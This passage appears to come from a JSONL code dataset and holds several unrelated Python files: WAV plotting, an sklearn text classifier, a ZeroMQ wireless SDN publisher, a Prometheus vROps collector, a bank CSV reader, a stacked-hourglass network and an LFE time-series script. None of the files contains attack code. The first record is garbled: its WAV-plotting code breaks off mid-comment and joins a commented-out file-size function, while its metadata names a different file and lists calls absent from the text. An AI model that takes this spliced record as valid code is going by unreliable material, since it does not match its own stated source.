+{"seq_id": "72602257", "text": "#from pylab import*\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.io import wavfile\r\nimport numpy as np\r\nimport wave\r\n\r\ndef plot_wave(file,color,linewidth):\r\n\twith wave.open(file,'r') as wav_file:\r\n\t\tfs = wav_file.getframerate() #44100hz\r\n\t\tfr = wav_file.getnframes()\r\n\t\t\r\n\t\t\r\n\t\tsignal = wav_file.readframes(-1)\r\n\t\tsignal = np.frombuffer(signal, 'int16')\r\n\t\t\t\t\r\n\t\ts2 = signal[::2] #every other element, in this case, 1 channel of sterio\r\n\t\t#s3 = signal[1::2] #get the other channel\r\n\t\t#s2 = s2/(2.**15) #adjust the data to float (-1 (1000 * 1000 * 1000 * 1000):\n # size = offload / (1000 * 1000 * 1000 * 1000)\n # size_value = \"TB\"\n # elif offload > (1000 * 1000 * 1000):\n # size = offload / (1000 * 1000 * 1000)\n # size_value = \"GB\"\n # elif offload > (1000 * 1000):\n # size = offload / (1000 * 1000)\n # size_value = \"MB\"\n # elif offload > (1000):\n # size = offload / (1000)\n # size_value = \"KB\"\n # else:\n # size = offload\n # size_value = \"Bytes\"\n\n # return size, size_value\n\n\n", "sub_path": "tests/common/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tempfile.mkstemp", "line_number": 9, "usage_type": "call"}, {"api_name": "os.close", "line_number": 10, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 21, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 28, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 28, "usage_type": "call"}, {"api_name": "hurry.filesize.size", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "492688425", "text": "import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\nimport numpy as np\nimport pdb\nimport os\nfrom sklearn.svm import SVC\n\n# #authorship...\nfile = os.path.join(os.getcwd(), os.listdir(os.getcwd())[0])\ndir = os.path.dirname(file) + '/data/predefined_tasks'\nauthorship_test = open(os.path.join(dir, 'authorship/authorship_test.txt'))\nauthorship_train = open(os.path.join(dir, 'authorship/authorship_train.txt'))\nauthorship_path_pkl = os.path.join(dir, 'authorship/')\nauthorship_file_pkl = open(os.path.join(authorship_path_pkl,'authorship.pkl'),'a')\n\n#train data...\nauthorship_train_lines = authorship_train.readlines()\nauthorship_train_labels = []\nauthorship_train_texts = []\npdb.set_trace()\nfor line in authorship_train_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tauthorship_train_labels.append(label)\n\tauthorship_train_texts.append(text)\n#test data....\nauthorship_test_lines = authorship_test.readlines()\nauthorship_test_labels = []\nauthorship_test_texts = []\n\nfor line in authorship_test_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tauthorship_test_labels.append(label)\n\tauthorship_test_texts.append(text)\n\npdb.set_trace()\nclf_authorship = Pipeline([ ('vect', CountVectorizer(analyzer='char', ngram_range=(3,5))),\n\t\t('tfidf', TfidfTransformer()),\n\t\t('clf', SVC(C=0.001)),\n\t])\nclf_authorship = clf_authorship.fit(authorship_train_texts, authorship_train_labels)\n\nprediction = clf_authorship.score(authorship_test_texts, authorship_test_labels)\njoblib.dump(clf_authorship, os.path.join(authorship_path_pkl,'authorship.pkl'))\nauthorship_file_pkl.close()\n\n\n#sentiment...\nsentiment_test = open(os.path.join(dir, 'twitter_sentiment/sentiment_test.txt'))\nsentiment_train = open(os.path.join(dir, 'twitter_sentiment/sentiment_train.txt'))\nsentiment_path_pkl = os.path.join(dir, 'twitter_sentiment/')\nsentiment_file_pkl = open(os.path.join(sentiment_path_pkl,'sentiment.pkl'),'a')\n\n#train data...\nsentiment_train_lines = sentiment_train.readlines()\nsentiment_train_labels = []\nsentiment_train_texts = []\npdb.set_trace()\nfor line in sentiment_train_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tsentiment_train_labels.append(label)\n\tsentiment_train_texts.append(text)\n#test data....\nsentiment_test_lines = sentiment_test.readlines()\nsentiment_test_labels = []\nsentiment_test_texts = []\n\nfor line in sentiment_test_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tsentiment_test_labels.append(label)\n\tsentiment_test_texts.append(text)\n\npdb.set_trace()\nclf_sentiment = Pipeline([ ('vect', CountVectorizer(analyzer='char', ngram_range=(1,7))),\n\t\t#('tfidf', TfidfTransformer()),\n\t\t('clf', SVC(C=10.0)),\n\t])\nclf_sentiment = clf_sentiment.fit(sentiment_train_texts, sentiment_train_labels)\n\nprediction = clf_sentiment.score(sentiment_test_texts, sentiment_test_labels)\njoblib.dump(clf_sentiment, os.path.join(sentiment_path_pkl,'sentiment.pkl'))\nsentiment_file_pkl.close()\n\nauthorship_test.close()\nauthorship_train.close()\nsentiment_test.close()\nsentiment_train.close()\n", "sub_path": "initialize_authorship_sentiment.py", "file_name": 
"initialize_authorship_sentiment.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 23, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 64, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 91, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "580784165", "text": "#writing script for publisher wireless\nimport pyangbind\nimport zmq\nimport socket\nfrom socket import *\nimport time\nimport threading\nimport json\nimport wirel_to_orc\nimport jsonpickle\nfrom threading import Thread\nimport os\nimport re\nimport wirel_to_orc\nimport pyangbind.lib.pybindJSON as pybindJSON\n\nsw= wirel_to_orc.wirel_to_orc()\n\nob= sw.ControllerMac.clients.add(\"01:23:45:67:89:ab\")\nob.ip=\"192.168.1.1\"\nob.throughput=\"3.1\"\nob.Signal=\"3.14\"\n\ndef get_ip_data(ether_adapter):\n ip_data = os.popen(\"ifconfig \" + ether_adapter)\n for line in ip_data:\n match2 = re.search(r'inet\\s+(\\d+.\\d+.\\d+.\\d+)', line)\n if match2:\n ip_ = match2.group(1)\n\n return ip_\n\ndef get_bd_address(ether_adapter):\n ip_data = os.popen(\"ifconfig \" + ether_adapter)\n for line in ip_data:\n match2 = re.search(r'broadcast\\s+(\\d+.\\d+.\\d+.\\d+)', line)\n if match2:\n bcast = match2.group(1)\n return bcast\n\n#Send Broadcast\ndef bd_send(Host,port):\n sock=socket(AF_INET,SOCK_DGRAM)\n msg='hello'\n sock.setsockopt(SOL_SOCKET,SO_BROADCAST,1)\n sock.sendto(msg.encode(),(Host,port))\n\n#This is for publishing to the controller\ndef publish():\n sw=wirel_to_orc.wirel_to_orc()\n ob= sw.ControllerMac.clients.add(\"01:23:45:67:89:ab\")\n ob.ip=\"192.168.1.27\"\n ob.throughput=\"1.1\"\n ob.Signal=\"1.4\"\n a=sw.get()\n\n packet = (pybindJSON.dumps(sw))\n context=zmq.Context()\n socket=context.socket(zmq.PUB)\n socket.bind(\"tcp://*:6782\")\n for data in range(2):\n socket.send_string('wireless: %s' % packet,encoding=\"Utf-8\")\n time.sleep(1)\n socket.close()\ndef rep(host,port):\n context=zmq.Context()\n socket=context.socket(zmq.REP)\n socket.bind('tcp://' '%s:%d' %(host,port))\n message=socket.recv_json(1024)\n print(message)\n\nif __name__==\"__main__\":\n ethernet_card = \"wlp1s0\"\n bd_of_the_machine = get_bd_address(ethernet_card)\n ip_of_the_machine = get_ip_data(ethernet_card)\n\n t1 = threading.Thread(target=bd_send, name=\"Broadcast_send\", args=(bd_of_the_machine, 5694))\n t1.start()\n threads=threading.Thread(target=publish)\n threads.start()\n t2=threading.Thread(target=rep,args=(ip_of_the_machine,9843))\n t2.start()", "sub_path": "Wireless_SDN.py", "file_name": "Wireless_SDN.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "wirel_to_orc.wirel_to_orc", "line_number": 17, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 25, "usage_type": "call"}, {"api_name": "re.search", "line_number": 27, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 36, "usage_type": "call"}, {"api_name": "wirel_to_orc.wirel_to_orc", "line_number": 50, "usage_type": "call"}, {"api_name": "pyangbind.lib.pybindJSON.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "pyangbind.lib.pybindJSON", "line_number": 57, "usage_type": "name"}, {"api_name": "zmq.Context", "line_number": 58, "usage_type": "call"}, {"api_name": "zmq.PUB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "socket.bind", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.send_string", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "socket.close", "line_number": 64, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 66, "usage_type": "call"}, {"api_name": "zmq.REP", 
"line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.bind", "line_number": 68, "usage_type": "call"}, {"api_name": "socket.recv_json", "line_number": 69, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 77, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 79, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "305680489", "text": "from BaseCollector import BaseCollector\nimport os, time\nfrom prometheus_client.core import GaugeMetricFamily\nfrom tools.Resources import Resources\nfrom tools.YamlRead import YamlRead\n\n\nclass DatastoreStatsCollector(BaseCollector):\n def __init__(self):\n self.wait_for_inventory_data()\n self.statkey_yaml = YamlRead('collectors/statkey.yaml').run()\n # self.post_registered_collector(self.__class__.__name__, self.g.name)\n\n def describe(self):\n yield GaugeMetricFamily('vrops_datastore_stats', 'testtext')\n\n def collect(self):\n g = GaugeMetricFamily('vrops_datastore_stats', 'testtext', labels=['datacenter', 'vccluster', 'hostsystem', 'datastore', 'statkey'])\n if os.environ['DEBUG'] >= '1':\n print(self.__class__.__name__ + \" starts with collecting the metrics\")\n\n #make one big request per stat id with all resource id's in its belly\n for target in self.get_datastores_by_target():\n token = self.get_target_tokens()\n token = token[target]\n if not token:\n print(\"skipping \" + target + \" in \" + self.__class__.__name__ + \" , no token\")\n\n uuids = self.target_datastores[target]\n for statkey_pair in self.statkey_yaml[self.__class__.__name__]:\n statkey_label = statkey_pair['label']\n statkey = statkey_pair['statkey']\n values = Resources.get_latest_stat_multiple(target, token, uuids, statkey)\n if not values:\n print(\"skipping statkey \" + str(statkey) + \" in \" + self.__class__.__name__ + \" , no return\")\n continue\n for value_entry in values:\n #there is just one, because we are querying latest only\n metric_value = value_entry['stat-list']['stat'][0]['data'][0]\n datastore_id = value_entry['resourceId']\n g.add_metric(labels=[self.datastores[datastore_id]['datacenter'],\n self.datastores[datastore_id]['cluster'],\n self.datastores[datastore_id]['parent_host_name'],\n self.datastores[datastore_id]['name'],\n statkey_label], value=metric_value)\n # self.post_metrics(self.g.name)\n yield g\n", "sub_path": "collectors/DatastoreStatsCollector.py", "file_name": "DatastoreStatsCollector.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "BaseCollector.BaseCollector", "line_number": 8, "usage_type": "name"}, {"api_name": "tools.YamlRead.YamlRead", "line_number": 11, "usage_type": "call"}, {"api_name": "prometheus_client.core.GaugeMetricFamily", "line_number": 15, "usage_type": "call"}, {"api_name": "prometheus_client.core.GaugeMetricFamily", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tools.Resources.Resources.get_latest_stat_multiple", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.Resources.Resources", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "9263282", "text": "import csv\nimport logging\nfrom datetime import datetime\n\nfrom app_code.banktransactions.BankTransaction import BankTransaction\nfrom app_code.banktransactions.BankTransactionDataStore import BankTransactionDataStore\n\n\nclass BankTransactions(object):\n\n def is_date(self, dateStr):\n try:\n datetime.strptime(dateStr, '%d-%m-%Y')\n return True\n except ValueError:\n return False\n\n def read(self, filename):\n logger = logging.getLogger(\"BankTransactions\")\n logger.info(\"Load file: \" + filename)\n row_counter = 0\n storage = BankTransactionDataStore()\n with open(filename, 'rb') as csvfile:\n rowreader = csv.reader(csvfile, delimiter=';', quotechar='\"',)\n for row in rowreader:\n bt = BankTransaction()\n if ((len(row) >= 9) and self.is_date(row[0])):\n bt.valutaDatum = row[0]\n bt.reference = row[1]\n bt.type = row[2].decode(\"latin_1\")\n bt.amount = row[3]\n bt.currency = row[4]\n bt.date = row[5]\n bt.sourceAccount = row[6]\n bt.name = row[7]\n bt.message1 = row[8]\n bt.message2 = row[9]\n storage.save_bank_transaction(bt)\n row_counter += 1\n else:\n logger.warn(\"Invalid line (header?)\")\n logger.info(\"Loaded %s transactions\", row_counter)\n\n", "sub_path": "core/app_code/banktransactions/BankTransactions.py", "file_name": "BankTransactions.py", "file_ext": "py", "file_size_in_byte": 1534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "app_code.banktransactions.BankTransactionDataStore.BankTransactionDataStore", "line_number": 22, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 24, "usage_type": "call"}, {"api_name": "app_code.banktransactions.BankTransaction.BankTransaction", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "143282080", "text": "import moai.networks.lightning as minet\nimport moai.nn.convolution as mic\nimport moai.nn.residual as mires\nimport moai.nn.sampling.spatial.downsample as mids\nimport moai.modules.lightning as mimod\nimport moai.nn.utils as miu\n\nimport torch\n\nimport hydra.utils as hyu\nimport omegaconf.omegaconf as omegaconf\nimport typing\nimport logging\n\nlog = logging.getLogger(__name__)\n\n#NOTE: from https://github.com/anibali/pytorch-stacked-hourglass/blob/master/src/stacked_hourglass/model.py\n#NOTE: from https://github.com/princeton-vl/pytorch_stacked_hourglass/blob/master/models/posenet.py\n\n__all__ = [\"StackedHourglass\"]\n\nclass StackedHourglass(minet.FeedForward):\n def __init__(self,\n configuration: omegaconf.DictConfig,\n modules: omegaconf.DictConfig,\n data: omegaconf.DictConfig=None,\n parameters: omegaconf.DictConfig=None,\n feedforward: omegaconf.DictConfig=None,\n monads: omegaconf.DictConfig=None,\n supervision: omegaconf.DictConfig=None,\n validation: omegaconf.DictConfig=None,\n visualization: omegaconf.DictConfig=None,\n export: omegaconf.DictConfig=None,\n ):\n super(StackedHourglass, self).__init__(\n data=data, parameters=parameters,\n feedforward=feedforward, monads=monads,\n supervision=supervision, validation=validation,\n export=export, visualization=visualization, \n ) \n self.stacks = configuration.stacks\n preproc = configuration.preproc\n projection = configuration.projection\n prediction = configuration.prediction\n merge = configuration.merge\n hourglass = modules['hourglass']\n self.pre = torch.nn.Sequential(\n mic.make_conv_block(\n block_type=preproc.block,\n convolution_type=preproc.convolution,\n in_features=configuration.in_features, \n out_features=hourglass.features // 4,\n activation_type=preproc.activation,\n convolution_params={\n \"kernel_size\": preproc.stem.kernel_size,\n \"stride\": preproc.stem.stride,\n \"padding\": preproc.stem.padding,\n },\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 4,\n out_features=hourglass.features // 2,\n bottleneck_features=hourglass.features // 2,\n activation_type=preproc.activation,\n strided=False,\n ),\n mids.make_downsample(\n downscale_type=preproc.downscale,\n features=hourglass.features // 2,\n kernel_size=3 if preproc.downscale == 'maxpool2d_aa' else 2,\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 2,\n out_features=hourglass.features // 2,\n bottleneck_features=hourglass.features // 2,\n activation_type=preproc.activation,\n strided=False,\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 2,\n out_features=hourglass.features,\n bottleneck_features=hourglass.features,\n activation_type=preproc.activation,\n strided=False,\n ),\n )\n \n self.hgs = torch.nn.ModuleList([\n torch.nn.Sequential(\n hyu.instantiate(hourglass)\n ) for i in range(self.stacks)\n ] \n )\n \n self.features = torch.nn.ModuleList([\n torch.nn.Sequential(\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features,\n out_features=hourglass.features,\n bottleneck_features=hourglass.features,\n activation_type=preproc.activation,\n strided=False,\n ),\n mic.make_conv_block(\n block_type=projection.block,\n convolution_type=projection.convolution,\n 
in_features=hourglass.features, \n out_features=hourglass.features,\n activation_type=projection.activation,\n convolution_params={\"kernel_size\": 1, \"padding\": 0},\n )\n ) for i in range(self.stacks)\n ]\n )\n \n self.outs = torch.nn.ModuleList([\n mic.make_conv_block(\n block_type=prediction.block,\n convolution_type=prediction.convolution,\n in_features=hourglass.features, \n out_features=configuration.out_features,\n activation_type=prediction.activation,\n convolution_params={\n \"kernel_size\": 1, \"padding\": 0, \n },\n activation_params={\"inplace\": True} \n ) for i in range(self.stacks) \n ])\n self.merge_features = torch.nn.ModuleList([\n torch.nn.Sequential(\n mic.make_conv_1x1(\n convolution_type=projection.convolution,\n in_channels=hourglass.features,\n out_channels=hourglass.features\n ),\n torch.nn.Dropout2d(p=merge.dropout, inplace=True)\\\n if merge.dropout > 0.0 else torch.nn.Identity()\n ) for i in range(self.stacks-1)\n ])\n self.merge_preds = torch.nn.ModuleList([\n torch.nn.Sequential(\n mic.make_conv_1x1(\n convolution_type=projection.convolution,\n in_channels=configuration.out_features,\n out_channels=hourglass.features\n ),\n torch.nn.Dropout2d(p=prediction.dropout, inplace=False)\\\n if prediction.dropout > 0.0 else torch.nn.Identity()\n ) for i in range(self.stacks-1)\n ])\n self.input = configuration.input\n self.output_prefix = configuration.output\n\n def forward(self, \n td: typing.Dict[str, torch.Tensor]\n ) -> typing.Dict[str, torch.Tensor]: \n img = td[self.input]\n x = self.pre(img)\n combined_hm_preds = []\n for i in range(self.stacks):\n hg = self.hgs[i](x)\n feature = self.features[i](hg)\n preds = self.outs[i](feature)\n combined_hm_preds.append(preds)\n if i < self.stacks - 1: \n x = x + self.merge_preds[i](preds) + self.merge_features[i](feature)\n for i, heatmap in enumerate(combined_hm_preds):\n td[f\"{self.output_prefix}_{i+1}\"] = heatmap\n return td\n\n ", "sub_path": "moai/networks/lightning/factory/stacked_hourglass.py", "file_name": "stacked_hourglass.py", "file_ext": "py", "file_size_in_byte": 7335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "moai.networks.lightning.FeedForward", "line_number": 22, "usage_type": "attribute"}, {"api_name": "moai.networks.lightning", "line_number": 22, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 24, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 24, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 25, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 25, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 26, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 26, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 27, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 27, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 28, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 28, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 29, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 29, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 
30, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 30, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 31, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 31, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 32, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 32, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 33, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 48, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 48, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 60, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 60, "usage_type": "name"}, {"api_name": "moai.nn.sampling.spatial.downsample.make_downsample", "line_number": 69, "usage_type": "call"}, {"api_name": "moai.nn.sampling.spatial.downsample", "line_number": 69, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 74, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 74, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 83, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "attribute"}, {"api_name": "hydra.utils.instantiate", "line_number": 96, "usage_type": "call"}, {"api_name": "hydra.utils", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "attribute"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 103, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 103, "usage_type": "name"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 112, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 125, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_1x1", "line_number": 139, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 139, 
"usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn.Identity", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_1x1", "line_number": 150, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.nn.Identity", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 163, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "attribute"}]}
+{"seq_id": "563216231", "text": "import matplotlib.pylab as pylab\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom datetime import datetime, timedelta\nfrom math import floor\n\ndef get_time_series(df, window, tbegin, tend):\n \"\"\"\n Function to transform the LFE catalog into a time series\n\n Input:\n type df = panda DataFrame\n df = Times of LFE detections\n type window = float\n window = Duration of the time window where we count the number of LFEs\n (in seconds)\n type tbegin = obspy UTCDateTime\n tbegin = Beginning time of the catalog \n type tend = obspy UTCDateTime\n tend = End time of the catalog\n Output:\n type X = numpy array\n X = Time series with number of LFEs per time window\n \"\"\"\n # Length of the time series\n dt = tend - tbegin\n duration = dt.days * 86400.0 + dt.seconds + dt.microseconds * 0.000001\n nw = int(duration / window)\n X = np.zeros(nw, dtype=int)\n # Loop on LFEs\n for j in range(0, len(df)):\n myYear = df['year'].iloc[j]\n myMonth = df['month'].iloc[j]\n myDay = df['day'].iloc[j]\n myHour = df['hour'].iloc[j]\n myMinute = df['minute'].iloc[j]\n mySecond = int(floor(df['second'].iloc[j]))\n myMicrosecond = int(1000000.0 * (df['second'].iloc[j] - mySecond))\n t = datetime(myYear, myMonth, myDay, myHour, myMinute, mySecond, \\\n myMicrosecond)\n # Add LFE to appropriate time window\n if ((tbegin <= t) and (t < tbegin + timedelta(seconds=nw * window))):\n dt = t - tbegin\n duration = dt.days * 86400.0 + dt.seconds + dt.microseconds * \\\n 0.000001\n index = int(duration / window)\n X[index] = X[index] + 1 \n return X\n\n# Plot figure\nplt.figure(1, figsize=(10, 10))\nparams = {'xtick.labelsize':16,\n 'ytick.labelsize':16}\npylab.rcParams.update(params)\nwindow = 86400.0\npath = '/Users/ariane/Documents/ResearchProject/ETSscripts/catalog/'\n\n# Family 080421.14.048\ntbegin = 